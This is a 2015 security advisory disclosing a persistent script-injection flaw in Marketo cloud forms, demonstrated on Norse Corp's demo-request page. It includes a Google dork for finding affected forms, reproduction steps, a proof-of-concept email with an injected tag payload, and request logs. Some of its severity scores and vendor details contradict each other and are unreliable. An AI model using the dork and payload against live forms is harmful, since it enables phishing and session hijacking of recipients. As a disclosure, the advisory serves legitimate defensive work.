Document Title:
===============
Marketo Cloud - Persistent Mail Encoding Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1321


Release Date:
=============
2015-01-13


Vulnerability Laboratory ID (VL-ID):
====================================
1321


Common Vulnerability Scoring System:
====================================
3.5


Product & Service Introduction:
===============================
Marketo Inc. makes marketing automation software for companies. In 2012, Marketo was ranked 78th on the Inc. 500, #7 among software 
companies, and #1 among marketing software companies.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Marketo )

Norse is the global leader in live attack intelligence. Norse delivers continuously-updated and unique Internet and darknet intel 
that helps organizations detect and block attacks that other systems miss. The superior Norse DarkMatter™ platform detects new 
threats and tags nascent hazards long before they`re spotted by traditional `threat intelligence` tools. Norse`s globally 
distributed `distant early warning` grid of millions of sensors, honeypots, crawlers and agents deliver unique visibility into 
the Internet - especially the darknets, where bad actors operate. The Norse DarkMatter™ network processes hundreds of terabytes 
daily and computes over 1,500 distinct risk factors, live, for millions of IP addresses every day. Norse products tightly 
integrate with popular SIEM, IPS and next-generation Firewall products to dramatically improve the performance, catch-rate 
and security return-on-investment of your existing infrastructure.

( Copy of the Vendor Homepage: http://www.norse-corp.com/about.html )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent mail encoding web vulnerability in the official Marketo cloud online-service web-application.



Vulnerability Disclosure Timeline:
==================================
2014-09-09:	Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-09-10:	Vendor Notification (Norse-Corp)
2014-09-12:	Vendor Response/Feedback (Norse-Corp informs Marketo)
2014-**-**:	Vendor Fix/Patch Notification (Barracuda Networks - Developer Team)
2015-01-13:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Norse Corp
Product: Norse Corp - Web Application (Online Service) 2014 Q3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Technical Details & Description:
================================
A persistent mail encoding web vulnerability has been discovered in the official Marketo cloud online-service web-application.
The vulnerability allows an remote attacker to inject own malicious script codes on the application-side of the vulnerable 
web-application online-service.

The vulnerability is located in the web input form of the marketo demo registration (request_demo.html) module. Remote attackers 
are able to register a request with persistent script code in the first- & lastname values. The affect becomes visible in the outgoing email 
of the customers web-server and could maybe affect other sections in the later registered profile. The attacker injects a payload and streams 
the malicious mail with own content to another target user email. The filter of the web-server is not validating the context of the mail on input 
through the website. The result is an application-side script code execution in the mail header after the introduction user word. The mail includes 
the registered user (db stored) with the payload context and does not encode the input.

The wrong encoded cloud forms are located in a lot of famous websites like norse-corp, samsung, intel, canon, citrix, cropcam, enterasys, f5, 
kaspersky, sandisk, sony and panasonic. The fail is not the customer who implements because of the input restrictions are being processed through 
the cloud stored form in the marketo service. The encoding of the web-server does not encode the input and returns the data with the wrong conditions.

The security risk of the persistent input validation web vulnerability in the mail encoding of the web-server is estimated as medium with a cvss 
(common vulnerability scoring system) count of 3.9. Exploitation of the mail encoding and web-server validation vulnerability requires low or medium 
user interaction and no privileged customer application user account. Successful exploitation of the persistent mail encoding web vulnerability results 
in session hijacking, persistent phishing attacks, persistent redirects to external malicious source and persistent manipulation of affected or connected 
module context.


Request Method(s):
				[+] POST

Vulnerable Module(s):
				[+] request_demo.html

Vulnerable Parameter(s):
				[+] Firstname
				[+] Lastname

Affected Module(s):
				[+] Marketo Notification Mail Service


Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerbaility can be exploited by remote attackers without privileged application user account and with low interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Googel Dork(s): (exp. allinurl:leadCapture/save) 
https://encrypted.google.com/#q=allinurl%3AleadCapture%2Fsave&filter=0


Manual steps to reproduce the security vulnerability through norsecorp ...

1. Open your browser and surf to the customer website (http://www.norse-corp.com/)
2. Click the `Request a Demo` button on top of the web-application service
3. Now, include as firstname and lastname a script code with malicious test payload and include a random target user mail (test own!)
4. Save the settings by a click on the send message button in the form
Note: The server saved the POST method request values in the application database with processing to filter
5. The service sends a mail as notification to invite the customer to the demo online-service
Note: The reply goes back to the target mail by the main info@norse-corp.com postbox
6. The execution of the injected script code occurs in the outgoing notification mail next to the introduction context word `Hi`
7. Successful reproduce of the security vulnerability!


PoC: (Example Exploit Code)  Norse Corp Service Mail (info@norse-corp.com)

<html>
<head>
<title>Thank You for Contacting Us!</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css"></head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><b>Betreff: </b>
Thank You for Contacting Us!</td></tr><tr><td><b>Von: </b>Norse <info@norse-corp.com></td></tr><tr><td><b>Datum: </b>
03.09.2014 16:11</td></tr></table><table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part2"><tr><td><b>An:</b>
bkm@evolution-sec.com</td></tr></table><br>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head>
<meta http-equiv="Content-Type" content="text/html; ">
<title></title></head>
<body ><div ><div class="mktEditable" id="edit_text_1" ><p>
<span style="font-family: arial, helvetica, sans-serif; font-size: 12px;">Hi "><img src="x">%20>"<iframe src=a>%20<iframe>,<br /> <br /> 
Thanks for contacting Norse.        A representative will be reaching out to you shortly.        
In the meantime, please feel free to visit the <a href=
"http://info.norse-corp.com/Q05L0JN0OF2BN0e0R00e5O1" target="_blank"
>Norse website</a> for additional information.        <br /> <br /> Norse is the global leader in live attack intelligence. 
Norse delivers continuously-updated and unique intelligence that helps organizations detect and block attacks – especially 
from the darknets - that other systems miss. The superior Norse DarkMatter™ platform detects new threats and tags nascent 
hazards long before they’re spotted by traditional “threat intelligence” tools.   <br /><br />We look 
forward to speaking with   you soon.       <br /> </span></p>
<p><span style="font-family: arial, helvetica, sans-serif; font-size: 12px;">Best<br /> Regards,</span></p>
<p><span style="font-size: 12px;"><span style="font-family: verdana,geneva;"><span style="font-family: arial, helvetica, sans-serif;">
Scott  Schneider</span><br /><span style="font-family: arial, helvetica, sans-serif;">Vice President of Sales</span><br />
<span style="font-family: arial, helvetica, sans-serif;">ss@norse-corp.com</span></span><span style="font-family: verdana,geneva;">
<br /></span><span style="font-family: verdana,geneva;"> <br /></span></span></p></div>
</div><IMG SRC="http://info.norse-corp.com/trk?t=1&mid=NjgxLU9OTC0yOTM6MDoxNjE4OjI4Mjg6MDo1NDA6NzoxMzgyODM2LTE6bnVsbA%3D%3D" WIDTH="1" 
HEIGHT="1" BORDER="0" ALT="" />
<p><font face="Verdana" size="1">This email was sent to bkm@evolution-sec.com. If you no longer wish to receive these emails you may 
<a href="http://info.norse-corp.com/u/Me0L0N0JO550R10fB0ON0G2"
>unsubscribe</a> at any time. </font> </p>
</body></html></body></html>

Note: The same issues could be located in the other reference formular links that are present. 
For deeper analysis the issue has been reported to the norsecorp with attach ref links.


PoC: Webinar with Rick Holland of Forrester - Actionable Intelligence: A Threat Intelligence Buyer's Guide Service Mail (info@norse-corp.com)

<td width="51%" valign="top" ><div class="mktEditable" id="Left-Column" style="color:#000000; font-family:'Frutiger Roman',arial,verdana; font-size:12px; " >
<div><span style="font-family: arial, helvetica, sans-serif; font-size: 12px;">Hi [PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE #2],<br /><br /></span></div>
<div><span style="font-family: arial, helvetica, sans-serif; font-size: 12px;"> Today’s threat actors are more sophisticated than ever, and organizations need 
live attack intelligence that alerts them to emerging threats long before they become full-blown attacks that lead to sensitive data loss. Furthermore, organizations 
need the most current threat data available in order to protect their networks from incursions – they need real-time actionable intelligence. <br /><br /> 
Join us for the upcoming webinar, “Actionable Intelligence: A Threat Intelligence Buyer’s Guide” featuring Rick Holland, Principal Analyst at 
Forrester Research, and Jeff Harrell, Senior Director, Product Marketing at Norse, to learn how to evaluate the various threat intelligence offerings in the 
marketplace, and how to utilize them to prevent today’s advanced attacks. <br /><br /> In this webinar you will learn about: <br /> 
<ul><li>The criteria needed to effectively evaluate threat intelligence solutions that meet your organization's needs </li>
<li>The value of the different types and sources of internal and external threat intelligence</li>
<li>How best to utilize threat intelligence to realize a greater return on security investments and better protect your organization</li>
</ul><br />Feel free to <a href="http://info.norse-corp.com/wNJLe5ROB0000O1D00N2B0y" target="_blank"
>contact us</a> to learn more information.</span></div><ul></ul></div></td>


--- PoC Session Logs [POST] (Inject) ---

14:06:15.430[638ms][total 638ms] Status: 302[Found]
POST http://pages.norse-corp.com/index.php/leadCapture/save Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[152] Mime Type[text/html]
   Request Header:
      Host[pages.norse-corp.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://pages.norse-corp.com/WEB-DemoRequest_LP.html]
      Cookie[__utma=62177331.1558909612.1410519916.1410519916.1410519916.1; __utmb=62177331.17.10.1410519916; __utmc=62177331; __utmz=62177331.1410519916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.1558909612.1410519916; _mkto_trk=id:681-ONL-293&token:_mch-norse-corp.com-1410519918900-26442; __rampmetrics_user=031E00D0-ABD1-4612-B248-3B6E9327E1DB; __rampmetrics_data=%7B%22rampmetrics_id%22%3A%22e1449d703d%22%2C%22uuid%22%3A%22031E00D0-ABD1-4612-B248-3B6E9327E1DB%22%2C%22rampmetrics_referring_url__c%22%3A%22undefined.%22%2C%22rampmetrics_inbound_url__c%22%3A%22%22%2C%22rampmetrics_destination_url__c%22%3A%22http%3A%2F%2Fwww.norse-corp.com%2F%22%2C%22rampmetrics_last_visited_url__c%22%3A%22http%3A%2F%2Fwww.norse-corp.com%2Frequest_demo.html%22%2C%22rampmetrics_referring_domain__c%22%3A%22undefined.%22%2C%22rampmetrics_form_type__c%22%3A%22normal%22%2C%22rampmetrics_person_id__c%22%3A%22031E00D0-ABD1-4612-B248-3B6E9327E1DB%22%7D; BIGipServersj01web_login_http=67633162.20480.0000; _gat=1; __csess=1410525020184.58GBI8.; __cdrop=.92BA4D.]
      Connection[keep-alive]
   POST-Daten:
      FirstName[%5BSCRIPT+CODE+PAYLOAD+%231%5D]
      LastName[%5BSCRIPT+CODE+PAYLOAD+%232%5D]
      Email[bkm%40evolution-sec.com]
      Phone[01478348732]
      Company[%5BSCRIPT+CODE+PAYLOAD+%233%5D]
      Product__c_lead[DarkViking]
      Comments__c[]
      rampmetrics_UTM_Campaign__c[NULL]
      rampmetrics_UTM_Content__c[NULL]
      rampmetrics_UTM_Medium__c[NULL]
      rampmetrics_UTM_Source__c[NULL]
      rampmetrics_UTM_Term__c[NULL]
      rampmetrics_Search_Phrase__c[]
      rampmetrics_Referring_URL__c[]
      rampmetrics_Referring_Domain__c[]
      rampmetrics_Person_ID__c[]
      rampmetrics_Last_Visited_URL__c[]
      rampmetrics_Last_URL_Before_Form__c[]
      rampmetrics_Landing_Page_URL__c[]
      rampmetrics_Form_Fill_Out_URL__c[]
      rampmetrics_Destination_URL__c[]
      rampmetrics_Campaign_ID__c[]
      _marketo_comments[]
      lpId[467]
      subId[226]
      munchkinId[681-ONL-293]
      kw[not+found]
      cr[not+found]
      searchstr[not+found]
      lpurl[http%3A%2F%2Fpages.norse-corp.com%2FWEB-DemoRequest_LP.html%3Fcr%3D%7Bcreative%7D%26kw%3D%7Bkeyword%7D]
      formid[115]
      returnURL[http%3A%2F%2Fpages.norse-corp.com%2FWEBDemoRequest_ContentTemplate_ThankYou.html]
      retURL[http%3A%2F%2Fpages.norse-corp.com%2FWEBDemoRequest_ContentTemplate_ThankYou.html]
      returnLPId[459]
      _mkt_disp[return]
      _mkt_trk[id%3A681-ONL-293%26token%3A_mch-norse-corp.com-1410519918900-26442]
      _comments_marketo[]
      _mkto_version[2.4.7]
      MarketoSocialSyndicationId[]
   Response Header:
      Server[nginx]
      Date[Fri, 12 Sep 2014 12:06:18 GMT]
      Content-Type[text/html]
      Content-Length[152]
      Connection[keep-alive]
      Location[http://pages.norse-corp.com/WEBDemoRequest_ContentTemplate_ThankYou.html?aliId=822273]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]


14:06:16.069[725ms][total 725ms] Status: 200[OK]
GET http://pages.norse-corp.com/WEBDemoRequest_ContentTemplate_ThankYou.html?aliId=822273 Load Flags[LOAD_DOCUMENT_URI  LOAD_REPLACE  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[2690] Mime Type[text/html]
   Request Header:
      Host[pages.norse-corp.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://pages.norse-corp.com/WEB-DemoRequest_LP.html]
      Cookie[__utma=62177331.1558909612.1410519916.1410519916.1410519916.1; __utmb=62177331.17.10.1410519916; __utmc=62177331; 
__utmz=62177331.1410519916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.1558909612.1410519916; 
_mkto_trk=id:681-ONL-293&token:_mch-norse-corp.com-1410519918900-26442; __rampmetrics_user=031E00D0-ABD1-4612-B248-3B6E9327E1DB; 
__rampmetrics_data=%7B%22rampmetrics_id%22%3A%22e1449d703d%22%2C%22uuid%22%3A%22031E00D0-ABD1-4612-B248-3B6E9327E1DB%22%2C%22rampmetrics_
referring_url__c%22%3A%22undefined.%22%2C%22rampmetrics_inbound_url__c%22%3A%22%22%2C%22rampmetrics_destination_url__
c%22%3A%22http%3A%2F%2Fwww.norse-corp.com%2F%22%2C%22rampmetrics_last_visited_url__c%22%3A%22http%3A%2F%2Fwww.norse-corp.com
%2Frequest_demo.html%22%2C%22rampmetrics_referring_domain__c%22%3A%22undefined.%22%2C%22rampmetrics_form_type__c%22%3A%22normal%22%2C%22rampmetrics_person_id__
c%22%3A%22031E00D0-ABD1-4612-B248-3B6E9327E1DB%22%7D; BIGipServersj01web_login_http=67633162.20480.0000; _gat=1; __csess=1410525020184.58GBI8.; __cdrop=.92BA4D.]
      Connection[keep-alive]
   Response Header:
      Server[nginx]
      Date[Fri, 12 Sep 2014 12:06:19 GMT]
      Content-Type[text/html; charset=utf-8]
      Content-Length[2690]
      Connection[keep-alive]
      P3P[CP="CAO CURa ADMa DEVa TAIa OUR IND UNI COM NAV INT"]
      Vary[*,Accept-Encoding]
      Content-Encoding[gzip]


Reference(s):
http://www.norse-corp.com/
http://www.norse-corp.com/request_demo.html
http%3A%2F%2Fpages.norse-corp.com%2FWEBDemoRequest_ContentTemplate_ThankYou.html
http://pages.norse-corp.com/index.php/leadCapture/save
-
http://www.norse-corp.com/contact.html
http://pages.norse-corp.com/WEBPartnerRequest.html


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the firstname and lastname values in the registration forms.
Restrict the input and disallow the usage of special chars to prevent further mail encoding script code attacks with application-side vector.



Security Risk:
==============
The security risk of the persistent mail encoding validation web vulnerability in the registration form is estimated as medium. (CVSS 3.5)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory [Evolution Security]